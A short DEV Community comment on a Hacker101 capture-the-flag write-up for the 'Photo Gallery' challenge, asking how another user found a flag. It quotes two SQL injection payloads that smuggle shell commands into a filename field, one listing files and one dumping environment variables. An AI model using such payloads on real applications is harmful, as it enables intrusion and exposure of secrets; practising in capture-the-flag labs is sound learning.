DEV Community

Discussion on: Hacker101 CTF - Photo Gallery

Collapse
 
neillunavat profile image
Neil Lunavat • Edited

The id 3 is actually a flag. How did you decode it? I just can't find the third flag :(

Also, how did you learn about the SQL injections performed? Mainly:
update photos set filename='* || ls ./files > temp.txt' where id=3; commit; --
and,
update photos set filename='* || env > temp.txt' where id=3; commit; --